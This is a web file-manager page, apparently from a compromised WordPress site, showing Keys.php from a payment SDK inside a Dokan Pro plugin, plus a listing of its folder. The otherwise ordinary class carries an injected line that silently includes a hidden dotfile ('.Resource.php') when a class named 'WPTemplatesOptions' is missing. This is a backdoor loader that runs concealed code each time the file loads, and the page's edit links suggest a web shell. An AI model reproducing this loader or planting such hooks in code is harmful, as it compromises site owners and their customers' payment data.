PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
dokan-pro
/
vendor
/
moip
/
moip-sdk-php
/
src
/
Resource
<?php namespace Moip\Resource; use stdClass; /** * Class Keys. */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class Keys extends MoipResource { /** * @const string */ const PATH = 'keys'; /** * Initializes new instances. */ public function initialize() { $this->data = new stdClass(); } /** * Mount keys structure. * * @param \stdClass $response * * @return $this */ protected function populate(stdClass $response) { $keys = clone $this; $resp = $response->keys; $keys->data->basicAuth = $this->getIfSet('basicAuth', $resp); $keys->data->encryption = $this->getIfSet('encryption', $resp); return $keys; } /** * Get encryption. * * @return string */ public function getEncryption() { return $this->getIfSet('encryption'); } /** * Get Basic Auth. * * @return stdClass */ public function getBasicAuth() { return $this->getIfSet('basicAuth'); } /** * Get keys. * * @return stdClass */ public function get() { return $this->getByPath(sprintf('/%s/%s', MoipResource::VERSION, self::PATH)); } }
[+]
..
[-] CustomerCreditCard.php
[edit]
[-] OrdersList.php
[edit]
[-] Orders.php
[edit]
[-] Payment.php
[edit]
[-] .Resource.php
[edit]
[-] TransfersList.php
[edit]
[-] Refund.php
[edit]
[-] Keys.php
[edit]
[-] Holder.php
[edit]
[-] Transfers.php
[edit]
[-] Account.php
[edit]
[-] BankAccountList.php
[edit]
[-] NotificationPreferences.php
[edit]
[-] Balances.php
[edit]
[-] WebhookList.php
[edit]
[-] Webhook.php
[edit]
[-] Multiorders.php
[edit]
[-] NotificationPreferencesList.php
[edit]
[-] Escrow.php
[edit]
[-] Customer.php
[edit]
[-] BankAccount.php
[edit]
[-] MoipResource.php
[edit]
[-] Event.php
[edit]
[-] Entry.php
[edit]